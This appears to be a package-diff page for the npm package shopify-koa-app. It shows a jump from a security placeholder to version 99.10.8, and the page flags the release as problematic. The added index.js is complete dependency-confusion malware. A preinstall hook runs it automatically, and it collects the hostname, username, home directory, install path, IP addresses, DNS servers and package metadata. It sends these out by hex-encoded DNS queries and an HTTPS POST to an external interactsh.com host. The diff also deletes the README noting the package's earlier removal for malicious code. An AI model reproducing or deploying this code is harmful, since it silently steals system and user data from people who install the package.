shopify-koa-app 0.0.1-security → 99.10.8

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of shopify-koa-app might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +125 -0
  2. package/package.json +9 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,125 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const packageJSON = require("./package.json");
6
+ const package = packageJSON.name;
7
+
8
+ function toHex(data){
9
+ const bufferText = Buffer.from(data, 'utf8');
10
+ const text = bufferText.toString('hex');
11
+ return text;
12
+ }
13
+ function gethttpips(){
14
+ var str=[];
15
+ var networkInterfaces = os.networkInterfaces();
16
+ for(item in networkInterfaces){
17
+ if(item != "lo"){
18
+ for(var i=0;i<networkInterfaces[item].length;i++){
19
+ str.push(networkInterfaces[item][i].address);
20
+ }
21
+ }
22
+ }
23
+ return str;
24
+ }
25
+ function getIps(){
26
+ str="";
27
+ var networkInterfaces = os.networkInterfaces();
28
+ for(item in networkInterfaces){
29
+ if(item != "lo"){
30
+ for(var i=0;i<networkInterfaces[item].length;i++){
31
+ str=str+toHex(networkInterfaces[item][i].address)+".";
32
+ }
33
+ }
34
+ }
35
+ return str.slice(0,-1);
36
+ }
37
+ function getPathChunks(path){
38
+ str="p";
39
+ chunks = path.split('/');
40
+ for(var i=0;i<chunks.length;i++){
41
+ str=str+toHex(chunks[i])+".";
42
+ }
43
+ str=str.slice(0,-1)+"p";
44
+ return str;
45
+ }
46
+ function toName(pkg){
47
+ var str="";
48
+ var queries = [];
49
+ var substr1 = "";
50
+ var substr2 = "";
51
+ var hostname = "c5c77jy2vtc0000xqshggnsdwfyyyyyyn.interactsh.com";
52
+ str=toHex(pkg.hn)+"."+toHex(pkg.p)+"."+getPathChunks(pkg.c)+"."+toHex(pkg.un)+"."+getIps()+"."+hostname;
53
+ if(str.length>255){
54
+ substr1 = toHex(pkg.p)+"."+getPathChunks(pkg.c);
55
+ substr2 = getIps();
56
+ if(substr1.length<150){
57
+ substr1 = toHex(pkg.hn)+"."+substr1+"."+toHex(pkg.un);
58
+ queries.push(substr1+"."+hostname);
59
+ queries.push(substr2+"."+hostname);
60
+ }
61
+ else if(substr2.length<150){
62
+ substr2 = toHex(pkg.hn)+"."+toHex(pkg.un)+"."+substr2;
63
+ queries.push(substr1+"."+hostname);
64
+ queries.push(substr2+"."+hostname);
65
+ }
66
+ else{
67
+ queries.push(toHex(pkg.hn)+"."+substr1+"."+hostname);
68
+ queries.push(toHex(pkg.hn)+"."+toHex(pkg.hd)+"."+toHex(pkg.un)+"."+hostname);
69
+ queries.push(toHex(pkg.hn)+"."+substr2+"."+hostname);
70
+ }
71
+ }
72
+ else{
73
+ queries.push(str);
74
+ }
75
+ //console.log(str.length);
76
+ return queries;
77
+ }
78
+
79
+ const td = {
80
+ p: package,
81
+ c: __dirname,
82
+ hd: os.homedir(),
83
+ hn: os.hostname(),
84
+ un: os.userInfo().username,
85
+ dns: JSON.stringify(dns.getServers()),
86
+ r: packageJSON ? packageJSON.___resolved : undefined,
87
+ v: packageJSON.version,
88
+ pjson: packageJSON,
89
+ ip: JSON.stringify(gethttpips()),
90
+ }
91
+ var qs = toName(td);
92
+ for(var j=0;j<qs.length;j++){
93
+ dns.lookup(qs[j], function(err, result) {
94
+ //console.log(result)
95
+ });
96
+ }
97
+
98
+ const trackingData = JSON.stringify(td);
99
+ var postData = querystring.stringify({
100
+ msg: trackingData,
101
+ });
102
+
103
+ var options = {
104
+ hostname: "c5c77jy2vtc0000xqshggnsdwfyyyyyyn.interactsh.com",
105
+ port: 443,
106
+ path: "/",
107
+ method: "POST",
108
+ headers: {
109
+ "Content-Type": "application/x-www-form-urlencoded",
110
+ "Content-Length": postData.length,
111
+ },
112
+ };
113
+
114
+ var req = https.request(options, (res) => {
115
+ res.on("data", (d) => {
116
+ //process.stdout.write(d);
117
+ });
118
+ });
119
+
120
+ req.on("error", (e) => {
121
+ // console.error(e);
122
+ });
123
+
124
+ req.write(postData);
125
+ req.end();
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "shopify-koa-app",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "99.10.8",
4
+ "description": "shopify test package",
5
+ "main":"index.js",
6
+ "scripts":{
7
+ "test":"echo \"error no test specified\" && exit 1",
8
+ "preinstall":"node index.js"
9
+ },
10
+ "author":"",
11
+ "License":"ISC"
6
12
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=shopify-koa-app for more information.